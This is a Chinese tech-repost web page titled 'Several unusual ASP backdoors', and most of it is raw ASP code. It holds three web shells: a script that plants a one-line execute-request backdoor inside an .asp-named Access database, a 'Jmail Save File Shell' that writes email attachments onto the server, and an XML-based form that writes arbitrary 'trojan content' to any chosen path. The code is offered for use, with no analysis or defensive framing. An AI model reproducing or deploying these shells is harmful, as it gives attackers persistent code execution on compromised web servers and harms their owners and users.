作家
登录
ASP

几种另类的ASP后门

作者: 来源:www.28hudong.com 2013-03-30 08:31:15 阅读 我要评论

<% 'code by netpatch dim dbfile,sql db="netpatch.asp" dbfile=server.MapPath(db) set ydb=server.CreateObject("ADOX.Catalog") ydb.Create "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & dbfile set ydb=nothing if err.number=0 then Response.Write dbfile & " 创建成功<br> " else Response.Write "创建失败,原因: " & err.description Response.End end if Set Conn = Server.CreateObject("ADODB.Connection") Conn.Open "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & dbfile sql="CREATE TABLE fdata([data] Memo)" conn.execute(sql) Set rs = CreateObject("ADODB.RecordSet") rs.Open "FData", conn, 1, 3 rs.addnew rs("data")="┼攠數畣整爠煥敵瑳∨≮┩>" '(注释记得去掉!一句话后门 execute request(“n”)) rs.update %> 用Jmail写文件进硬盘 <% 'codz by kEvin1986 [S4T] User=Request.Form("User") Pass=Request.Form("Pass") Popserver=Request.Form("Popserver") if User<>"" and Pass<>"" and Popserver<>"" then Set objmail = CreateObject( "JMail.POP3" ) objmail.Connect User, Pass, Popserver set objmsg=CreateObject("jmail.message") Set objmsg = objmail.Messages.item(1) separator = ", " response.write "Attachment Name is: " & SaveAtta & "<br>" objmail.Disconnect End if Function SaveAtta() Set Attachments = objmsg.Attachments separator = ", " response.write "The size of this Attachment is: " & objmsg.size & "<br>" For i = 0 To Attachments.Count - 1 If i = Attachments.Count - 1 Then separator = "" End If Set Theatta = Attachments(i) response.write Theatta.Name Theatta.SaveToFile(Server.Mappath(".") & "" & Theatta.Name) Response.write "Oh!Hey Guy.....That's OK!" Next End Function %> <Html> <Head> <Title>Jmail Save File Shell</Title> </Head> <Body> <Center> <Form Method="POST"> User: <input name="User" type=text value="kevin1986"><br> Pass: <input name="Pass" type=text value="1986lovinghuan"><br> POP3: <input name="Popserver" type=text value="pop.163.com"><br> <input type=submit value="Get the Attachments Of the First Mail"> </Form> </Center> </Body> </Html> 利用xml写马 <%on error resume next%> <form id="form1" name="form1" method="post" action=''''> <p>木马内容</p> <p><textarea name="flashboy" cols="80" rows="10"></textarea></p> <p>路径</p> <p><input name="textfield" type="text" size="50" /></p> <p><input type="submit" name="Submit" value="提交" /></p></form> <p><%Response.write "本文件绝对路径"%> <%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%></p> <% dim xmlString dim xmlDoc xmlString= Request("flashboy") set xmlDoc = server.createObject("Msxml2.DOMDocument") xmlDoc.loadXml(xmlString) f=Request("textfield") xmlDoc.save(f) set xmlDoc=nothing %>

  推荐阅读

  JavaScript面向对象的两种书写方法以及差别

javascript中的对象JS作为一种动态语言,在语法上有相当大的自由度,所以造成了一种功能,有N种写法的局面。 在JS中实现OOP,一般来说有两种方法: 第一种:使用this关键字 function Class1() { this.onclick >>>详细阅读


本文标题:几种另类的ASP后门

地址:http://www.17bianji.com/kaifa2/ASP/32300.html

 1/2    1 

关键词: 探索发现

乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

网友点评
自媒体专栏

评论

热度

进入专栏
精彩导读
栏目ID=71的表不存在(操作类型=0)
科技快报
© 2013-2016 IT技术  京ICP备11016124号-4   

京公网安备 11011202000261号
网站介绍 合作联系 寻求报道 投稿指南 网站地图 XML地图